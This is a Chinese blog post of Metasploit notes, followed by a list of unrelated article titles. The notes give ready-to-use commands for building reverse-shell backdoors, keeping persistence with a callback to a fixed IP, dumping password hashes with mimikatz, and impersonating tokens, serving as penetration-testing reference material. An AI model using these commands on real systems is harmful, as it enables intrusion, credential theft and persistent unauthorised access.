Metasploit笔记
生成exe后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe
生成PHP后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > php.php
使用监听模块(默认)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
搜寻存在漏洞模块
post/multi/recon/local_exploit_suggester
迁移进程
migrate pid
权限维持 -Persistence
run persistence -U -i 10 -p 4444 -r 192.168.61.3
抓取Hash
run hashdump
load mimikatz
令牌伪装
list_tokens-u
如果查看失败先用
use incognito
或者 load incognito
进入该模块 再使用
impersonate_token 用户名
基本操作命令
ls
:列出当前路径下的所有文件和文件夹。
pwd
或 getwd
:查看当前路径。
search
:搜索文件,使用 search -h
查看帮助。
cat
:查看文件内容,比如 cat test.txt
。
edit
:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。
rm
:删除文件。
cd
:切换路径。
mkdir
:创建文件夹。
rmdir
:删除文件夹。
getlwd
或 lpwd
:查看自己系统的当前路径。
lcd
:切换自己当前系统的目录。
lls
:显示自己当前系统的所有文件和文件夹。
upload
: upload
本地文件路径目标文件路径.
download
: download
目标文件路径 本地文件路径
原文地址:https://www.cnblogs.com/M0rta1s/p/11707871.html
- SpringBoot之前端文件管理
- Spring Boot 设置静态资源访问
- IDEA更换主题
- 用正则表达式给字符串属性值都加上双引号
- Spring Boot修改启动端口
- Packet for query is too large (12238 > 1024). You can change this value
- win10下端口被占用解决办法
- 微信小程序开发教程第九章:微信小程序拍照收纳开发以及删除名片等
- centos 安装sbt
- 微信小程序开发教程第七章:微信小程序编辑名片页面开发
- idea中使用scala运行spark出现Exception in thread "main" java.lang.NoClassDefFoundError: scala/collection/Gen
- 使用JPA中@Query 注解实现update 操作
- 微信小程序开发教程!博卡君第二弹【微信小程序项目结构以及配置】
- WCF浅尝
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Mongodb多键索引之数组文档
- 在 Cocos Creator 里画个炫酷的雷达图
- 用shader做一个柿子颜色的过场动画
- mysql 找出最新时间的一条数据
- 【NPM库】- 0x05 - 文件、路径操作
- MySQL中insert阻塞问题的分析
- Fedora32下编译安装Qemu5.1并创建ARM版本Linux虚拟机
- 面试官想问的HashMap,都在这一篇里面了!
- CentOS7下使用Mondo Rescue实现系统全备份
- CentOS7下搭建Rsyslog Server记录远程主机系统日志
- 企业运维经典面试题汇总(4)
- 使用QEMU模拟树莓派Raspberry Pi
- Octave梯度下降法最优化代价函数的一个例子—ML Note 38
- Spring Boot入门系列(十八)mybatis 使用注解实现增删改查,无需xml文件!
- Mongodb多键索引之嵌套文档